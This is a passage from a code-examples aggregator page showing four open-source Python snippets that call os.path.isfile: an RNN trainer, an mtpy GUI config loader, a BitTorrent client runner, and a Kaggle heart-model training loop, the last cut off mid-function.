Here are the examples of the python api os.path.isfile taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.
157 Examples
0
Example 51
Project: pycog Source File: trainer.py
def train(self, savefile, task, recover=True):
"""
Train the RNN.
Parameters
----------
savefile : str
task : function
recover : bool, optional
If `True`, will attempt to recover from a previously saved run.
"""
N = self.p['N']
Nin = self.p['Nin']
Nout = self.p['Nout']
alpha = self.p['dt']/self.p['tau']
# Initialize settings
settings = OrderedDict()
# Check if file already exists
if not recover:
if os.path.isfile(savefile):
os.remove(savefile)
#---------------------------------------------------------------------------------
# Are we using GPUs?
#---------------------------------------------------------------------------------
if theanotools.get_processor_type() == 'gpu':
settings['GPU'] = 'enabled'
else:
settings['GPU'] = 'no'
#---------------------------------------------------------------------------------
# Random number generator
#---------------------------------------------------------------------------------
settings['init seed'] = self.p['seed']
rng = np.random.RandomState(self.p['seed'])
#---------------------------------------------------------------------------------
# Weight initialization
#---------------------------------------------------------------------------------
settings['distribution (Win)'] = self.p['distribution_in']
settings['distribution (Wrec)'] = self.p['distribution_rec']
settings['distribution (Wout)'] = self.p['distribution_out']
if Nin > 0:
Win_0 = self.init_weights(rng, self.p['Cin'], N, Nin,
self.p['distribution_in'])
Wrec_0 = self.init_weights(rng, self.p['Crec'],
N, N, self.p['distribution_rec'])
Wout_0 = self.init_weights(rng, self.p['Cout'],
Nout, N, self.p['distribution_out'])
#---------------------------------------------------------------------------------
# Enforce Dale's law on the initial weights
#---------------------------------------------------------------------------------
settings['Nin/N/Nout'] = '{}/{}/{}'.format(Nin, N, Nout)
if self.p['ei'] is not None:
Nexc = len(np.where(self.p['ei'] > 0)[0])
Ninh = len(np.where(self.p['ei'] < 0)[0])
settings['Dale\'s law'] = 'E/I = {}/{}'.format(Nexc, Ninh)
if Nin > 0:
Win_0 = abs(Win_0) # If Dale, assume inputs are excitatory
Wrec_0 = abs(Wrec_0)
Wout_0 = abs(Wout_0)
else:
settings['Dale\'s law'] = 'no'
#---------------------------------------------------------------------------------
# Fix spectral radius
#---------------------------------------------------------------------------------
# Compute spectral radius
C = self.p['Crec']
if C is not None:
Wrec_0_full = C.mask_plastic*Wrec_0 + C.mask_fixed
else:
Wrec_0_full = Wrec_0
if self.p['ei'] is not None:
Wrec_0_full = Wrec_0_full*self.p['ei']
rho = RNN.spectral_radius(Wrec_0_full)
# Scale Wrec to have fixed spectral radius
if self.p['ei'] is not None:
R = self.p['rho0']/rho
else:
R = 1.1/rho
Wrec_0 *= R
if C is not None:
C.mask_fixed *= R
# Check spectral radius
if C is not None:
Wrec_0_full = C.mask_plastic*Wrec_0 + C.mask_fixed
else:
Wrec_0_full = Wrec_0
if self.p['ei'] is not None:
Wrec_0_full = Wrec_0_full*self.p['ei']
rho = RNN.spectral_radius(Wrec_0_full)
settings['initial spectral radius'] = '{:.2f}'.format(rho)
#---------------------------------------------------------------------------------
# Others
#---------------------------------------------------------------------------------
brec_0 = self.p['brec']*np.ones(N)
bout_0 = self.p['bout']*np.ones(Nout)
x0_0 = self.p['x0']*np.ones(N)
#---------------------------------------------------------------------------------
# RNN parameters
#---------------------------------------------------------------------------------
if Nin > 0:
Win = theanotools.shared(Win_0, name='Win')
else:
Win = None
Wrec = theanotools.shared(Wrec_0, name='Wrec')
Wout = theanotools.shared(Wout_0, name='Wout')
brec = theanotools.shared(brec_0, name='brec')
bout = theanotools.shared(bout_0, name='bout')
x0 = theanotools.shared(x0_0, name='x0')
#---------------------------------------------------------------------------------
# Parameters to train
#---------------------------------------------------------------------------------
trainables = []
if Win is not None:
trainables += [Win]
trainables += [Wrec]
if Wout is not None:
trainables += [Wout]
if self.p['train_brec']:
settings['train recurrent bias'] = 'yes'
trainables += [brec]
else:
settings['train recurrent bias'] = 'no'
if self.p['train_bout']:
settings['train output bias'] = 'yes'
trainables += [bout]
else:
settings['train output bias'] = 'no'
# In continuous mode it doesn't make sense to train x0, which is forgotten
if self.p['mode'] == 'continuous':
self.p['train_x0'] = False
if self.p['train_x0']:
settings['train initial conditions'] = 'yes'
trainables += [x0]
else:
settings['train initial conditions'] = 'no'
#---------------------------------------------------------------------------------
# Weight matrices
#---------------------------------------------------------------------------------
# Input
if Nin > 0:
if self.p['Cin'] is not None:
C = self.p['Cin']
settings['sparseness (Win)'] = ('p = {:.2f}, p_plastic = {:.2f}'
.format(C.p, C.p_plastic))
Cin_mask_plastic = theanotools.shared(C.mask_plastic)
Cin_mask_fixed = theanotools.shared(C.mask_fixed)
Win_ = Cin_mask_plastic*Win + Cin_mask_fixed
Win_.name = 'Win_'
else:
Win_ = Win
# Recurrent
if self.p['Crec'] is not None:
C = self.p['Crec']
settings['sparseness (Wrec)'] = ('p = {:.2f}, p_plastic = {:.2f}'
.format(C.p, C.p_plastic))
Crec_mask_plastic = theanotools.shared(C.mask_plastic)
Crec_mask_fixed = theanotools.shared(C.mask_fixed)
Wrec_ = Crec_mask_plastic*Wrec + Crec_mask_fixed
Wrec_.name = 'Wrec_'
else:
Wrec_ = Wrec
# Output
if self.p['Cout'] is not None:
C = self.p['Cout']
settings['sparseness (Wout)'] = ('p = {:.2f}, p_plastic = {:.2f}'
.format(C.p, C.p_plastic))
Cout_mask_plastic = theanotools.shared(C.mask_plastic)
Cout_mask_fixed = theanotools.shared(C.mask_fixed)
Wout_ = Cout_mask_plastic*Wout + Cout_mask_fixed
Wout_.name = 'Wout_'
else:
Wout_ = Wout
#---------------------------------------------------------------------------------
# Dale's law
#---------------------------------------------------------------------------------
if self.p['ei'] is not None:
# Function to keep matrix elements positive
if self.p['ei_positive_func'] == 'abs':
settings['E/I positivity function'] = 'absolute value'
make_positive = abs
elif self.p['ei_positive_func'] == 'rectify':
settings['E/I positivity function'] = 'rectify'
make_positive = theanotools.rectify
else:
raise ValueError("Unknown ei_positive_func.")
# Assume inputs are excitatory
if Nin > 0:
Win_ = make_positive(Win_)
# E/I
ei = theanotools.shared(self.p['ei'], name='ei')
Wrec_ = make_positive(Wrec_)*ei
Wout_ = make_positive(Wout_)*ei
#---------------------------------------------------------------------------------
# Variables to save
#---------------------------------------------------------------------------------
if Nin > 0:
save_values = [Win_]
else:
save_values = [None]
save_values += [Wrec_, Wout_, brec, bout, x0]
#---------------------------------------------------------------------------------
# Activation functions
#---------------------------------------------------------------------------------
f_hidden, d_f_hidden = theanotools.hidden_activations[self.p['hidden_activation']]
settings['hidden activation'] = self.p['hidden_activation']
act = self.p['output_activation']
f_output = theanotools.output_activations[act]
if act == 'sigmoid':
settings['output activation/loss'] = 'sigmoid/binary cross entropy'
f_loss = theanotools.binary_crossentropy
elif act == 'softmax':
settings['output activation/loss'] = 'softmax/categorical cross entropy'
f_loss = theanotools.categorical_crossentropy
else:
settings['output activation/loss'] = act + '/squared'
f_loss = theanotools.L2
#---------------------------------------------------------------------------------
# RNN
#---------------------------------------------------------------------------------
# Dims: time, trials, units
# u[:,:,:Nin] contains the inputs (including baseline and noise),
# u[:,:,Nin:] contains the recurrent noise
u = T.tensor3('u')
x0_ = T.alloc(x0, u.shape[1], x0.shape[0])
if Nin > 0:
def rnn(u_t, x_tm1, r_tm1, WinT, WrecT):
x_t = ((1 - alpha)*x_tm1
+ alpha*(T.dot(r_tm1, WrecT) # Recurrent
+ brec # Bias
+ T.dot(u_t[:,:Nin], WinT) # Input
+ u_t[:,Nin:]) # Recurrent noise
)
r_t = f_hidden(x_t)
return [x_t, r_t]
[x, r], _ = theano.scan(fn=rnn,
outputs_info=[x0_, f_hidden(x0_)],
sequences=u,
non_sequences=[Win_.T, Wrec_.T])
else:
def rnn(u_t, x_tm1, r_tm1, WrecT):
x_t = ((1 - alpha)*x_tm1
+ alpha*(T.dot(r_tm1, WrecT) # Recurrent
+ brec # Bias
+ u_t[:,Nin:]) # Recurrent noise
)
r_t = f_hidden(x_t)
return [x_t, r_t]
[x, r], _ = theano.scan(fn=rnn,
outputs_info=[x0_, f_hidden(x0_)],
sequences=u,
non_sequences=[Wrec_.T])
#---------------------------------------------------------------------------------
# Running mode
#---------------------------------------------------------------------------------
if self.p['mode'] == 'continuous':
settings['mode'] = 'continuous'
if self.p['n_gradient'] != 1:
print("[ Trainer.train ] In continuous mode,"
" so we're setting n_gradient to 1.")
self.p['n_gradient'] = 1
x0_ = x[-1]
else:
settings['mode'] = 'batch'
#---------------------------------------------------------------------------------
# Readout
#---------------------------------------------------------------------------------
z = f_output(T.dot(r, Wout_.T) + bout)
#---------------------------------------------------------------------------------
# Deduce whether the task specification contains an output mask -- use a
# temporary dataset so it doesn't affect the training.
#---------------------------------------------------------------------------------
dataset = Dataset(1, task, self.floatX, self.p, name='gradient')
if dataset.has_output_mask():
settings['output mask'] = 'yes'
else:
settings['output mask'] = 'no'
#---------------------------------------------------------------------------------
# Loss
#---------------------------------------------------------------------------------
# (time, trials, outputs)
target = T.tensor3('target')
# Set mask
mask = target[:,:,Nout:]
masknorm = T.sum(mask)
# Input-output pairs
inputs = [u, target]
# target[:,:,:Nout] contains the target outputs, &
# target[:,:,Nout:] contains the mask.
# Loss, not including the regularization terms
loss = T.sum(f_loss(z, target[:,:,:Nout])*mask)/masknorm
# Root-mean-squared error
error = T.sqrt(T.sum(theanotools.L2(z, target[:,:,:Nout])*mask)/masknorm)
#---------------------------------------------------------------------------------
# Regularization terms
#---------------------------------------------------------------------------------
regs = 0
#---------------------------------------------------------------------------------
# L1 weight regularization
#---------------------------------------------------------------------------------
lambda1 = self.p['lambda1_in']
if lambda1 > 0:
settings['L1 weight regularization (Win)'] = ('lambda1_in = {}'
.format(lambda1))
regs += lambda1 * T.mean(abs(Win))
lambda1 = self.p['lambda1_rec']
if lambda1 > 0:
settings['L1 weight regularization (Wrec)'] = ('lambda1_rec = {}'
.format(lambda1))
regs += lambda1 * T.mean(abs(Wrec))
lambda1 = self.p['lambda1_out']
if lambda1 > 0:
settings['L1 weight regularization (Wout)'] = ('lambda1_out = {}'
.format(lambda1))
regs += lambda1 * T.mean(abs(Wout))
#---------------------------------------------------------------------------------
# L2 weight regularization
#---------------------------------------------------------------------------------
if Nin > 0:
lambda2 = self.p['lambda2_in']
if lambda2 > 0:
settings['L2 weight regularization (Win)'] = ('lambda2_in = {}'
.format(lambda2))
regs += lambda2 * T.mean(Win**2)
lambda2 = self.p['lambda2_rec']
if lambda2 > 0:
settings['L2 weight regularization (Wrec)'] = ('lambda2_rec = {}'
.format(lambda2))
regs += lambda2 * T.mean(Wrec**2)
lambda2 = self.p['lambda2_out']
if lambda2 > 0:
settings['L2 weight regularization (Wout)'] = ('lambda2_out = {}'
.format(lambda2))
regs += lambda2 * T.mean(Wout**2)
#---------------------------------------------------------------------------------
# L2 rate regularization
#---------------------------------------------------------------------------------
lambda2 = self.p['lambda2_r']
if lambda2 > 0:
settings['L2 rate regularization'] = 'lambda2_r = {}'.format(lambda2)
regs += lambda2 * T.mean(r**2)
#---------------------------------------------------------------------------------
# Final costs
#---------------------------------------------------------------------------------
costs = [loss, error]
#---------------------------------------------------------------------------------
# Datasets
#---------------------------------------------------------------------------------
gradient_data = Dataset(self.p['n_gradient'], task, self.floatX, self.p,
batch_size=self.p['gradient_batch_size'],
seed=self.p['gradient_seed'],
name='gradient')
validation_data = Dataset(self.p['n_validation'], task, self.floatX, self.p,
batch_size=self.p['validation_batch_size'],
seed=self.p['validation_seed'],
name='validation')
# Input noise
if np.isscalar(self.p['var_in']):
if Nin > 0:
settings['sigma_in'] = '{}'.format(np.sqrt(self.p['var_in']))
else:
settings['sigma_in'] = 'array'
# Recurrent noise
if np.isscalar(self.p['var_rec']):
settings['sigma_rec'] = '{}'.format(np.sqrt(self.p['var_rec']))
else:
settings['sigma_rec'] = 'array'
# Dataset settings
settings['rectify inputs'] = self.p['rectify_inputs']
settings['gradient minibatch size'] = gradient_data.minibatch_size
settings['validation minibatch size'] = validation_data.minibatch_size
#---------------------------------------------------------------------------------
# Other settings
#---------------------------------------------------------------------------------
settings['dt'] = '{} ms'.format(self.p['dt'])
if np.isscalar(self.p['tau']):
settings['tau'] = '{} ms'.format(self.p['tau'])
else:
settings['tau'] = 'custom'
settings['tau_in'] = '{} ms'.format(self.p['tau_in'])
settings['learning rate'] = '{}'.format(self.p['learning_rate'])
settings['lambda_Omega'] = '{}'.format(self.p['lambda_Omega'])
settings['max gradient norm'] = '{}'.format(self.p['max_gradient_norm'])
#---------------------------------------------------------------------------------
# A few important Theano settings
#---------------------------------------------------------------------------------
settings['(Theano) floatX'] = self.floatX
settings['(Theano) allow_gc'] = theano.config.allow_gc
#---------------------------------------------------------------------------------
# Train!
#---------------------------------------------------------------------------------
print_settings(settings)
sgd = SGD(trainables, inputs, costs, regs, x, z, self.p, save_values,
{'Wrec_': Wrec_, 'd_f_hidden': d_f_hidden})
sgd.train(gradient_data, validation_data, savefile)
0
Example 52
Project: mtpy Source File: occamgui_v1.py
def load_old_configfile(self):
old_cfg_filename = self.ui.lineEdit_browse_configfile.text()
#if not a proper file: do nothing
try:
if not op.isfile(old_cfg_filename):
raise
except:
messagetext = ''
messagetext += "<P><FONT COLOR='#000000'>File name: "\
"{0} </FONT></P> \n".format(old_cfg_filename)
messagetext += "<P><b><FONT COLOR='#800000'>Error: Not a valid "\
"configuration file </FONT></b></P> \n"
QtGui.QMessageBox.about(self, "Reading configuration file", messagetext)
return
#try to read config file into dictionary:
parameters = {}
try:
#to test, if file is readable:
with open(old_cfg_filename) as F:
data = F.read()
temp_dict_outer = MTcf.read_configfile(old_cfg_filename)
if len(temp_dict_outer) == 0:
raise
for k,v in temp_dict_outer.items():
temp_dict_inner = v
parameters.update(temp_dict_inner)
except:
messagetext = ''
messagetext += "<P><FONT COLOR='#000000'>File name: "\
"{0} </FONT></P> \n".format(old_cfg_filename)
messagetext += "<P><b><FONT COLOR='#800000'>Error: File not valid or "\
"not readable </FONT></b></P> \n"
QtGui.QMessageBox.about(self, "Reading configuration file", messagetext)
return
#now go through all parameters and see if they are contained in the config file
#if yes, update the values in the fields
update_counter = 0
if 'block_merge_threshold' in parameters:
try:
value = float(parameters['block_merge_threshold'])
self.ui.doubleSpinBox_mergethreshold.setValue(value)
update_counter += 1
except:
pass
if 'datafile' in parameters:
try:
value = str(parameters['datafile'])
self.ui.lineEdit_browse_datafile.setText(value)
update_counter += 1
except:
pass
if 'debug_level' in parameters:
d = {'0':0,'1':1,'2':2 }
try:
value = str(int(float((parameters['debug_level'])))).lower()
self.ui.comboBox_debuglevel.setCurrentIndex(int(d[value]))
update_counter += 1
except:
pass
if 'edi_directory' in parameters:
try:
value = str(parameters['edi_directory'])
self.ui.lineEdit_browse_edi.setText(value)
update_counter += 1
except:
pass
if 'edi_type' in parameters:
d = {'z':0,'resphase':1,'spectra':2 }
try:
value = str(parameters['edi_type']).lower()
self.ui.comboBox_edi_type.setCurrentIndex(int(d[value]))
update_counter += 1
except:
pass
if 'firstlayer_thickness' in parameters:
try:
value = float(parameters['firstlayer_thickness'])
self.ui.spinBox_firstlayer.setValue(value)
update_counter += 1
except:
pass
if 'halfspace_resistivity' in parameters:
try:
value = float(parameters['halfspace_resistivity'])
self.ui.doubleSpinBox_rhostart.setValue(value)
update_counter += 1
except:
pass
if 'max_blockwidth' in parameters:
try:
value = float(parameters['max_blockwidth'])
self.ui.spinBox_maxblockwidth.setValue(value)
update_counter += 1
except:
pass
if 'max_no_frequencies' in parameters:
try:
value = str(parameters['max_no_frequencies'])
if len(value) == 0 or value.lower().strip() == 'none':
self.ui.checkBox_max_no_frequencies.setCheckState(0)
self.ui.spinBox_max_no_frequencies.setValue(0)
else:
value = int(float(value))
self.ui.checkBox_max_no_frequencies.setCheckState(2)
self.ui.spinBox_max_no_frequencies.setValue(value)
update_counter += 1
except:
self.ui.checkBox_max_no_frequencies.setCheckState(0)
if 'max_frequency' in parameters:
try:
value = str(parameters['max_frequency'])
if len(value) == 0 or value.lower().strip() == 'none':
self.ui.checkBox_max_frequency.setCheckState(0)
self.ui.doubleSpinBox_max_frequency.setValue(0)
else:
value = int(float(value))
self.ui.checkBox_max_frequency.setCheckState(2)
self.ui.doubleSpinBox_max_frequency.setValue(value)
update_counter += 1
except:
self.ui.checkBox_max_frequency.setCheckState(0)
if 'min_frequency' in parameters:
try:
value = str(parameters['min_frequency'])
if len(value) == 0 or value.lower().strip() == 'none':
self.ui.checkBox_min_frequency.setCheckState(0)
self.ui.doubleSpinBox_min_frequency.setValue(0)
else:
value = int(float(value))
self.ui.checkBox_min_frequency.setCheckState(2)
self.ui.doubleSpinBox_min_frequency.setValue(value)
update_counter += 1
except:
self.ui.checkBox_min_frequency.setCheckState(0)
if 'max_no_iterations' in parameters:
try:
value = int(float(parameters['max_no_iterations']))
self.ui.spinBox_max_no_iterations.setValue(value)
update_counter += 1
except:
pass
if 'mode' in parameters:
d = {'both':0,'tm':1,'te':2, 'tipper':3, 'all':4 }
try:
value = None
raw_value = str(parameters['mode']).lower()
if 'te' in raw_value:
value = 'te'
if 'tm' in raw_value:
value = 'both'
elif 'tm' in raw_value:
value = 'tm'
if 'both' in raw_value:
value = 'both'
elif 'tipper' in raw_value:
value = 'tipper'
if 'all' in raw_value:
value = 'all'
self.ui.comboBox_mode.setCurrentIndex(int(d[value]))
update_counter += 1
except:
pass
if 'model_name' in parameters:
try:
value = str(parameters['model_name'])
self.ui.lineEdit_modelname.setText(value)
update_counter += 1
except:
pass
if 'mu_start' in parameters:
try:
value = float(parameters['mu_start'])
self.ui.doubleSpinBox_lagrange.setValue(value)
update_counter += 1
except:
pass
if 'no_iteration' in parameters:
try:
value = int(float(parameters['no_iteration']))
self.ui.spinBox_iterationstep.setValue(value)
update_counter += 1
except:
pass
if 'no_layers' in parameters:
try:
value = int(float(parameters['no_layers']))
self.ui.spinBox_no_layers.setValue(value)
update_counter += 1
except:
pass
if 'phase_errorfloor' in parameters:
try:
value = (parameters['phase_errorfloor'])
if len(value) == 0 or value.lower().strip() == 'none':
self.ui.checkBox_phase_error.setCheckState(0)
self.ui.doubleSpinBox_phase_error.setValue(15)
else:
value = float(value)
self.ui.checkBox_phase_error.setCheckState(2)
self.ui.doubleSpinBox_phase_error.setValue(value)
update_counter += 1
except:
self.ui.checkBox_phase_error.setCheckState(0)
if 'reached_misfit' in parameters:
try:
value = int(float(parameters['reached_misfit']))
if value == 0:
self.ui.checkBox_misfitreached.setCheckState(0)
else:
self.ui.checkBox_misfitreached.setCheckState(2)
update_counter += 1
except:
self.ui.checkBox_misfitreached.setCheckState(0)
if 'rho_errorfloor' in parameters:
try:
value = (parameters['rho_errorfloor'])
if len(value) == 0 or value.lower().strip() == 'none':
self.ui.checkBox_rho_error.setCheckState(0)
self.ui.doubleSpinBox_rho_error.setValue(10)
else:
value = float(value)
self.ui.checkBox_rho_error.setCheckState(2)
self.ui.doubleSpinBox_rho_error.setValue(value)
update_counter += 1
except:
self.ui.checkBox_rho_error.setCheckState(0)
if 'tipper_errorfloor' in parameters:
try:
value = (parameters['tipper_errorfloor'])
if len(value) == 0 or value.lower().strip() == 'none':
self.ui.checkBox_tipper_error.setCheckState(0)
self.ui.doubleSpinBox_tipper_error.setValue(10)
else:
value = float(value)
self.ui.checkBox_tipper_error.setCheckState(2)
self.ui.doubleSpinBox_tipper_error.setValue(value)
update_counter += 1
except:
self.ui.checkBox_tipper_error.setCheckState(0)
if 'strike' in parameters:
try:
value = (parameters['strike'])
if len(value) == 0 or value.lower().strip() == 'none':
self.ui.checkBox_strike.setCheckState(0)
self.ui.doubleSpinBox_strike.setValue(0)
else:
value = float(value)
self.ui.checkBox_strike.setCheckState(2)
self.ui.doubleSpinBox_strike.setValue(value)
update_counter += 1
except:
self.ui.checkBox_strike.setCheckState(2)
self.ui.doubleSpinBox_strike.setValue(0)
else:
self.ui.checkBox_strike.setCheckState(0)
self.ui.doubleSpinBox_strike.setValue(0)
if 'target_rms' in parameters:
try:
value = float(parameters['target_rms'])
self.ui.doubleSpinBox_rms.setValue(value)
update_counter += 1
except:
pass
if 'model_depth' in parameters:
try:
value = float(parameters['model_depth'])
self.ui.doubleSpinBox_model_depth.setValue(value)
update_counter += 1
except:
pass
if 'wd' in parameters:
try:
value = str(parameters['wd'])
self.ui.lineEdit_browse_wd.setText(value)
update_counter += 1
except:
pass
messagetext = ''
messagetext += "<P><FONT COLOR='#000000'>Configuration file: "\
"{0} </FONT></P> \n".format(old_cfg_filename)
messagetext += "<P><b><FONT COLOR='#008080'>Read in {0} parameters"\
"</FONT></b></P>".format(update_counter)
QtGui.QMessageBox.about(self, "Update parameters from file", messagetext )
0
Example 53
Project: FriendlyTorrent Source File: tftornado.py
def run(autoDie, shareKill, userName, params):
try:
h = HeadlessDisplayer()
h.autoShutdown = autoDie
h.shareKill = shareKill
h.user = userName
while 1:
try:
config = parse_params(params)
except ValueError, e:
print 'error: ' + str(e) + '\nrun with no args for parameter explanations'
break
if not config:
print get_usage()
break
# log what we are starting up
transferLog("tornado starting up :\n", True)
transferLog(" - torrentfile : " + config['responsefile'] + "\n", True)
transferLog(" - userName : " + userName + "\n", True)
transferLog(" - transferStatFile : " + transferStatFile + "\n", True)
transferLog(" - transferCommandFile : " + transferCommandFile + "\n", True)
transferLog(" - transferLogFile : " + transferLogFile + "\n", True)
transferLog(" - transferPidFile : " + transferPidFile + "\n", True)
transferLog(" - autoDie : " + autoDie + "\n", True)
transferLog(" - shareKill : " + shareKill + "\n", True)
transferLog(" - minport : " + str(config['minport']) + "\n", True)
transferLog(" - maxport : " + str(config['maxport']) + "\n", True)
transferLog(" - max_upload_rate : " + str(config['max_upload_rate']) + "\n", True)
transferLog(" - max_download_rate : " + str(config['max_download_rate']) + "\n", True)
transferLog(" - min_uploads : " + str(config['min_uploads']) + "\n", True)
transferLog(" - max_uploads : " + str(config['max_uploads']) + "\n", True)
transferLog(" - min_peers : " + str(config['min_peers']) + "\n", True)
transferLog(" - max_initiate : " + str(config['max_initiate']) + "\n", True)
transferLog(" - max_connections : " + str(config['max_connections']) + "\n", True)
transferLog(" - super_seeder : " + str(config['super_seeder']) + "\n", True)
transferLog(" - security : " + str(config['security']) + "\n", True)
transferLog(" - auto_kick : " + str(config['auto_kick']) + "\n", True)
if 'crypto_allowed' in config:
transferLog(" - crypto_allowed : " + str(config['crypto_allowed']) + "\n", True)
if 'crypto_only' in config:
transferLog(" - crypto_only : " + str(config['crypto_only']) + "\n", True)
if 'crypto_stealth' in config:
transferLog(" - crypto_stealth : " + str(config['crypto_stealth']) + "\n", True)
transferLog(" - priority : " + str(config['priority']) + "\n", True)
transferLog(" - alloc_type : " + str(config['alloc_type']) + "\n", True)
transferLog(" - alloc_rate : " + str(config['alloc_rate']) + "\n", True)
transferLog(" - buffer_reads : " + str(config['buffer_reads']) + "\n", True)
transferLog(" - write_buffer_size : " + str(config['write_buffer_size']) + "\n", True)
transferLog(" - check_hashes : " + str(config['check_hashes']) + "\n", True)
transferLog(" - max_files_open : " + str(config['max_files_open']) + "\n", True)
transferLog(" - upnp_nat_access : " + str(config['upnp_nat_access']) + "\n", True)
# remove command-file if exists
if isfile(transferCommandFile):
try:
transferLog("removing command-file " + transferCommandFile + "...\n", True)
remove(transferCommandFile)
except:
pass
# write pid-file
currentPid = (str(getpid())).strip()
transferLog("writing pid-file : " + transferPidFile + " (" + currentPid + ")\n", True)
try:
pidFile = open(transferPidFile, 'w')
pidFile.write(currentPid + "\n")
pidFile.flush()
pidFile.close()
except Exception, e:
transferLog("Failed to write pid-file, shutting down : " + transferPidFile + " (" + currentPid + ")" + "\n", True)
break
myid = createPeerID()
seed(myid)
doneflag = Event()
def disp_exception(text):
print text
rawserver = RawServer(doneflag, config['timeout_check_interval'],
config['timeout'], ipv6_enable = config['ipv6_enabled'],
failfunc = h.failed, errorfunc = disp_exception)
upnp_type = UPnP_test(config['upnp_nat_access'])
while True:
try:
listen_port = rawserver.find_and_bind(config['minport'], config['maxport'],
config['bind'], ipv6_socket_style = config['ipv6_binds_v4'],
upnp = upnp_type, randomizer = config['random_port'])
break
except socketerror, e:
if upnp_type and e == UPnP_ERROR:
print 'WARNING: COULD NOT FORWARD VIA UPnP'
upnp_type = 0
continue
print "error: Couldn't listen - " + str(e)
h.failed()
return
response = get_response(config['responsefile'], config['url'], h.error)
if not response:
break
infohash = sha1(bencode(response['info'])).digest()
h.dow = BT1Download(h.display, h.finished, h.error, disp_exception, doneflag,
config, response, infohash, myid, rawserver, listen_port)
if not h.dow.saveAs(h.chooseFile, h.newpath):
break
if not h.dow.initFiles(old_style = True):
break
if not h.dow.startEngine():
h.dow.shutdown()
break
h.dow.startRerequester()
h.dow.autoStats()
if not h.dow.am_I_finished():
h.display(activity = 'connecting to peers')
# log that we are done with startup
transferLog("tornado up and running.\n", True)
# listen forever
rawserver.listen_forever(h.dow.getPortHandler())
# shutdown
h.display(activity = 'shutting down')
h.dow.shutdown()
break
try:
rawserver.shutdown()
except:
pass
if not h.done:
h.failed()
finally:
transferLog("removing pid-file : " + transferPidFile + "\n", True)
try:
remove(transferPidFile)
except:
transferLog("Failed to remove pid-file : " + transferPidFile + "\n", True)
pass
0
Example 54
Project: kaggle-heart Source File: train.py
def train_model(expid):
metadata_path = MODEL_PATH + "%s.pkl" % expid
if theano.config.optimizer != "fast_run":
print "WARNING: not running in fast mode!"
data_loader.filter_patient_folders()
print "Build model"
interface_layers = config().build_model()
output_layers = interface_layers["outputs"]
input_layers = interface_layers["inputs"]
top_layer = lasagne.layers.MergeLayer(
incomings=output_layers.values()
)
all_layers = lasagne.layers.get_all_layers(top_layer)
all_params = lasagne.layers.get_all_params(top_layer, trainable=True)
if "cutoff_gradients" in interface_layers:
submodel_params = [param for value in interface_layers["cutoff_gradients"] for param in lasagne.layers.get_all_params(value)]
all_params = [p for p in all_params if p not in submodel_params]
if "pretrained" in interface_layers:
for config_name, layers_dict in interface_layers["pretrained"].iteritems():
pretrained_metadata_path = MODEL_PATH + "%s.pkl" % config_name.split('.')[1]
pretrained_resume_metadata = np.load(pretrained_metadata_path)
pretrained_top_layer = lasagne.layers.MergeLayer(
incomings = layers_dict.values()
)
lasagne.layers.set_all_param_values(pretrained_top_layer, pretrained_resume_metadata['param_values'])
num_params = sum([np.prod(p.get_value().shape) for p in all_params])
print string.ljust(" layer output shapes:",36),
print string.ljust("#params:",10),
print string.ljust("#data:",10),
print "output shape:"
for layer in all_layers[:-1]:
name = string.ljust(layer.__class__.__name__, 32)
num_param = sum([np.prod(p.get_value().shape) for p in layer.get_params()])
num_param = string.ljust(int(num_param).__str__(), 10)
num_size = string.ljust(np.prod(layer.output_shape[1:]).__str__(), 10)
print " %s %s %s %s" % (name, num_param, num_size, layer.output_shape)
print " number of parameters: %d" % num_params
obj = config().build_objective(interface_layers)
train_loss_theano = obj.get_loss()
kaggle_loss_theano = obj.get_kaggle_loss()
segmentation_loss_theano = obj.get_segmentation_loss()
validation_other_losses = collections.OrderedDict()
validation_train_loss = obj.get_loss(average=False, deterministic=True, validation=True, other_losses=validation_other_losses)
validation_kaggle_loss = obj.get_kaggle_loss(average=False, deterministic=True, validation=True)
validation_segmentation_loss = obj.get_segmentation_loss(average=False, deterministic=True, validation=True)
xs_shared = {
key: lasagne.utils.shared_empty(dim=len(l_in.output_shape), dtype='float32') for (key, l_in) in input_layers.iteritems()
}
# contains target_vars of the objective! Not the output layers desired values!
# There can be more output layers than are strictly required for the objective
# e.g. for debugging
ys_shared = {
key: lasagne.utils.shared_empty(dim=target_var.ndim, dtype='float32') for (key, target_var) in obj.target_vars.iteritems()
}
learning_rate_schedule = config().learning_rate_schedule
learning_rate = theano.shared(np.float32(learning_rate_schedule[0]))
idx = T.lscalar('idx')
givens = dict()
for key in obj.target_vars.keys():
if key=="segmentation":
givens[obj.target_vars[key]] = ys_shared[key][idx*config().sunny_batch_size : (idx+1)*config().sunny_batch_size]
else:
givens[obj.target_vars[key]] = ys_shared[key][idx*config().batch_size : (idx+1)*config().batch_size]
for key in input_layers.keys():
if key=="sunny":
givens[input_layers[key].input_var] = xs_shared[key][idx*config().sunny_batch_size:(idx+1)*config().sunny_batch_size]
else:
givens[input_layers[key].input_var] = xs_shared[key][idx*config().batch_size:(idx+1)*config().batch_size]
updates = config().build_updates(train_loss_theano, all_params, learning_rate)
#grad_norm = T.sqrt(T.sum([(g**2).sum() for g in theano.grad(train_loss_theano, all_params)]))
#theano_printer.print_me_this("Grad norm", grad_norm)
iter_train = theano.function([idx], [train_loss_theano, kaggle_loss_theano, segmentation_loss_theano] + theano_printer.get_the_stuff_to_print(),
givens=givens, on_unused_input="ignore", updates=updates,
# mode=NanGuardMode(nan_is_error=True, inf_is_error=True, big_is_error=True)
)
iter_validate = theano.function([idx], [validation_train_loss, validation_kaggle_loss, validation_segmentation_loss] + [v for _, v in validation_other_losses.items()] + theano_printer.get_the_stuff_to_print(),
givens=givens, on_unused_input="ignore")
num_chunks_train = int(config().num_epochs_train * NUM_TRAIN_PATIENTS / (config().batch_size * config().batches_per_chunk))
print "Will train for %d chunks" % num_chunks_train
if config().restart_from_save and os.path.isfile(metadata_path):
print "Load model parameters for resuming"
resume_metadata = np.load(metadata_path)
lasagne.layers.set_all_param_values(top_layer, resume_metadata['param_values'])
start_chunk_idx = resume_metadata['chunks_since_start'] + 1
chunks_train_idcs = range(start_chunk_idx, num_chunks_train)
# set lr to the correct value
current_lr = np.float32(utils.current_learning_rate(learning_rate_schedule, start_chunk_idx))
print " setting learning rate to %.7f" % current_lr
learning_rate.set_value(current_lr)
losses_train = resume_metadata['losses_train']
losses_eval_valid = resume_metadata['losses_eval_valid']
losses_eval_train = resume_metadata['losses_eval_train']
losses_eval_valid_kaggle = [] #resume_metadata['losses_eval_valid_kaggle']
losses_eval_train_kaggle = [] #resume_metadata['losses_eval_train_kaggle']
else:
